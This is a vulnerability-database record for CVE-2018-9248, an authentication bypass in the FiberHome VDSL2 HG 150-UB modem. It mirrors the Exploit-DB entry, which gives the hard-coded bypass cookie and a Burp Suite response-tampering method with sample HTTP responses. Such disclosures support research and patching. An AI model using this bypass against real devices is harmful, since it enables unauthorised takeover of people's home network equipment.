ID

VAR-E-201804-0344


CVE

cve_id:CVE-2018-9248

Trust: 1.5

sources: PACKETSTORM: 147045 // EXPLOIT-DB: 44413

EDB ID

44413


TITLE

FiberHome VDSL2 Modem HG 150-UB - Authentication Bypass - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 44413

DESCRIPTION

FiberHome VDSL2 Modem HG 150-UB - Authentication Bypass. CVE-2018-9248 . webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 44413

AFFECTED PRODUCTS

vendor:fiberhomemodel:vdsl2 modem hg 150-ubscope: - version: -

Trust: 1.6

vendor:fiberhomemodel:vdsl2 modem hg 150-ub loginscope: - version: -

Trust: 0.5

sources: PACKETSTORM: 147045 // EXPLOIT-DB: 44413 // EDBNET: 97384

EXPLOIT

# Exploit Title: FiberHome VDSL2 Modem HG 150-UB Authentication Bypass
# Date: 04/03/2018
# Exploit Author: Noman Riffat
# Vendor Homepage: http://www.fiberhome.com/
# CVE : CVE-2018-9248, CVE-2018-9248

The vulnerability exists in plain text & hard coded cookie. Using any
cookie manager extension, an attacker can bypass login page by setting the
following Master Cookie.

Cookie: Name=0admin

Then access the homepage which will no longer require authentication.
http://192.168.10.1/

Due to improper session implementation, there is another way to bypass
login. The response header of homepage without authentication looks like
this.

HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Tue, 03 Apr 2018 18:33:12 GMT
Set-Cookie: Name=; path=/
Content-Type: text/html
Connection: close

<html><head><script language='javascript'>
parent.location='login.html'
</script></head><body></body></html>HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Tue, 03 Apr 2018 18:33:12 GMT
Content-Type: text/html
Connection: close

<html>
<head>
.. continue to actual homepage source

The response header looks totally messed up and by triggering burp suite
and modifying it to following will grant access to homepage without
authentication.

HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Tue, 03 Apr 2018 18:33:12 GMT
Set-Cookie: Name=; path=/
Content-Type: text/html
Connection: close

<html>
<head>
.. continue to actual homepage source

Trust: 1.0

sources: EXPLOIT-DB: 44413

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 44413

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 44413

TYPE

Authentication Bypass

Trust: 1.6

sources: EXPLOIT-DB: 44413 // EDBNET: 97384

TAGS

tag:exploit

Trust: 0.5

tag:bypass

Trust: 0.5

sources: PACKETSTORM: 147045

CREDITS

Noman Riffat

Trust: 0.6

sources: EXPLOIT-DB: 44413

EXTERNAL IDS

db:EXPLOIT-DBid:44413

Trust: 1.6

db:NVDid:CVE-2018-9248

Trust: 1.5

db:EDBNETid:97384

Trust: 0.6

db:PACKETSTORMid:147045

Trust: 0.5

sources: PACKETSTORM: 147045 // EXPLOIT-DB: 44413 // EDBNET: 97384

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2018-9248

Trust: 1.5

url:https://www.exploit-db.com/exploits/44413/

Trust: 0.6

sources: PACKETSTORM: 147045 // EXPLOIT-DB: 44413 // EDBNET: 97384

SOURCES

db:PACKETSTORMid:147045
db:EXPLOIT-DBid:44413
db:EDBNETid:97384

LAST UPDATE DATE

2022-07-27T09:58:21.645000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:147045date:2018-04-04T20:49:01
db:EXPLOIT-DBid:44413date:2018-04-06T00:00:00
db:EDBNETid:97384date:2018-04-06T00:00:00